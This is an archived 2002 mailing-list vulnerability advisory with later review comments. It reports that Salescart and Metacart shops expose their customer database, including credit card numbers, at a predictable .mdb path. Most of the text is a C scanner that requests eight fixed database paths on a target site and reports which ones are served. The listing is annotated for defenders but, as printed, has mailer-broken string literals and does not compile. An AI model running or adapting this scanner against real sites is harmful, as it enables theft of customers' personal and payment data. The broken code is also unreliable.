
Salescart vuln.


From: Tacettin Karadeniz <tacettinkaradeniz () yahoo com>
Date: Fri, 21 Jun 2002 13:44:24 -0700 (PDT)

Summary: 
On a business website built with Salescart, all
customer records
related to that website are reachable. The whole database
is kept in the
shop.mdb file, in the fpdb directory. Any user can
reach this database without permission.
 This database holds some sensitive information, namely:
name, surname, address,
e-mail, phone number, credit card number, company name
...
 The credit card numbers in the shop.mdb file are placed in
the query part.

Problem:
Requesting the following URL returns the
database used by the product:
http://xxxshop.com/fpdb/shop.mdb



/* Salescart ve Metacart kullanILan bir alI$veri$
sitesindeki mu$teri 
kayItLarInI bulma */

/* tacettinkaradeniz () yahoo com    karadenizeregli@2002
  */

/* I LoVe CiLeK :>

/* Not: Bu programI ba$tan sona ben yazmadIm. Sadece
gerekli yerlerde 
degi$iklik yaparak istediGim duzene getirdim :> */

#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>



/*
 * Entry point. Resolves argv[1], connects to TCP port 80, sends a
 * "HEAD / HTTP/1.0" request and prints the raw reply, then requests each
 * of the eight .mdb paths held in tmp[] and reports a path as found when
 * the first 20 bytes of its reply contain the substring "200".
 *
 * Non-standard: main is declared void, so the process exit status is not
 * meaningful to whoever runs it.
 *
 * Identifier glossary (approximate translations from Turkish):
 * tampon = buffer, mesaj = message, toplam = total (used as the request
 * index), sayac = counter, buldum = "found" (hit count), bulunan = the
 * match pointer, hata = label printed on a hit, giris/duzelt = input /
 * corrected address.
 *
 * NOTE(review): as archived, several string literals below (tmp[4],
 * tmp[6], tmp[7], tmp[8] and the two printf calls at the end) were
 * wrapped by the mailer in the middle of the literal; the listing does
 * not compile in this form.
 *
 * Defender note: the probe is distinctive in web server access logs - a
 * HEAD / followed by GET requests for these eight fixed .mdb paths, all
 * sent as HTTP/1.0 with bare "\n\n" line endings instead of "\r\n\r\n".
 */
void main(int argc, char *argv[])
{

  char *bulunan;          /* strstr() result for mesaj inside shoptampon */
  char tampon[1024];      /* raw reply to the initial HEAD request; not NUL-terminated by this code */
  char mesaj[] = "200";   /* substring taken to mean "the file was served" */
  int toplam=0;           /* request index; the loop body below sees 1..8 */
  int sayac;              /* loop counter used to clear shoptampon */
  int buldum=0;           /* number of paths that produced a match */
  char shoptampon[20];    /* first 20 bytes of each GET reply */
  char *tmp[10];          /* request lines, 1-based; index 0 and 9 are never set */
  char *hata[10];         /* path labels printed on a hit, 1-based; index 0 and 9 never set */


  int sock;
  struct in_addr addr;    /* declared but never used */
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long giris;    /* inet_addr(argv[1]); only used to compute duzelt */
  unsigned long duzelt;   /* ntohl(giris); never read afterwards */


/* One request line per candidate database path (1-based). */
tmp[1]="GET /fpdb/shop.mdb HTTP/1.0\n\n";
tmp[2]="GET /shoponline/fpdb/shop.mdb HTTP/1.0\n\n";
tmp[3]="GET /database/metacart.mdb HTTP/1.0\n\n";
tmp[4]="GET /shopping/database/metacart.mdb
HTTP/1.0\n\n";
tmp[5]="GET /shop/database/metacart.mdb HTTP/1.0\n\n";
tmp[6]="GET /metacart/database/metacart.mdb
HTTP/1.0\n\n";
tmp[7]="GET /mcartfree/database/metacart.mdb
HTTP/1.0\n\n";
tmp[8]="GET /ASP/cart/database/metacart.mdb
HTTP/1.0\n\n";

/* Labels printed for a hit; they mirror the paths in tmp[] index for index. */
hata[1] = "/fpdb/shop.mdb  ";
hata[2] = "/shoponline/fpdb/shop.mdb  ";
hata[3] = "/database/metacart.mdb  ";
hata[4] = "/shopping/database/metacart.mdb  ";
hata[5] = "/shop/database/metacart.mdb  ";
hata[6] = "/metacart/database/metacart.mdb  ";
hata[7] = "/mcartfree/database/metacart.mdb  ";
hata[8] = "/ASP/cart/database/metacart.mdb  ";



/* No host argument: print the banner and usage, then exit with status 0. */
if (argc<2)
  {
system("clear");
printf("\n\t _                     ");
printf("\n\t|_  ._   _    _   |  o ");
printf("\n\t|_  |   (/_  (_|  |  | ");
printf("\n\t              _|       ");
printf("\n\nSalescart - Metacart  (c) 2002 ");
printf("\nKullanImI : %s www.xxxshopxyz.com
\n\n",argv[0]);

exit(0);
}

/* Resolve the target; on failure report the error and exit (status 0, not an error code). */
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname"); 
exit(0);
}
system("clear");
printf("\n\t _                     ");
printf("\n\t|_  ._   _    _   |  o ");
printf("\n\t|_  |   (/_  (_|  |  | ");
printf("\n\t              _|       ");
printf("\n\t  Salescart - Metacart  (c) 2002 ");

/* Numeric form of argv[1]; neither value is used after this point. */
giris=inet_addr(argv[1]);

duzelt=ntohl(giris);

/*
 * Initial connection to port 80. The socket() result is not checked, and
 * a failed connect() is only reported - execution continues and the
 * send()/recv() below run against the unconnected descriptor.
 */
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);

if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}
/* 17 is strlen("HEAD / HTTP/1.0\n\n"). */
send(sock, "HEAD / HTTP/1.0\n\n",17,0);

/*
 * recv()'s return value is ignored and tampon is never NUL-terminated, so
 * the printf below can read past the bytes actually received.
 */
recv(sock, tampon, sizeof(tampon),0);
printf("%s",tampon);
close(sock);
system("clear");
printf("Tarama YapILIyor..\n\n");

/* Post-increment in the condition: the body runs with toplam = 1..8. */
while(toplam++ < 8)
{
/* A fresh connection per request (HTTP/1.0, no keep-alive); same unchecked socket()/connect() as above. */
sock=socket(AF_INET, SOCK_STREAM, 0);
bcopy(he->h_addr, (char *)&sin.sin_addr,
he->h_length);
sin.sin_family=AF_INET;
sin.sin_port=htons(80);
if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
{
perror("connect");
}

/* Clear the reply buffer so a reply shorter than 20 bytes is NUL-terminated. */
for(sayac=0;sayac < 20;sayac++)
{
shoptampon[sayac] = '\0';
}

/* A full 20-byte reply leaves no terminator for the strstr() below. */
send(sock, tmp[toplam],strlen(tmp[toplam]),0);
recv(sock, shoptampon, sizeof(shoptampon),0);

/*
 * Any "200" in the first 20 bytes counts as a hit (normally the status
 * line "HTTP/1.x 200 OK"); a server that answers 200 for every path
 * would therefore report all eight paths.
 */
bulunan = strstr(shoptampon,mesaj);

if( bulunan != NULL)
{
printf("%s : ",hata[toplam]);
printf(" Oleyyy.. Bulundu :\)\n");++buldum;
}
close(sock);
}

/* Final summary: scan finished for argv[1], or nothing was found. */
if (buldum)
{
printf("\n Tarama isLemi %s web sistesi icin
bitti.\n", argv[1]);
}
else printf ("\n Uzgunum tarama sonucu bir veri
bulunamamIstIr...\n\n");

}


__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com

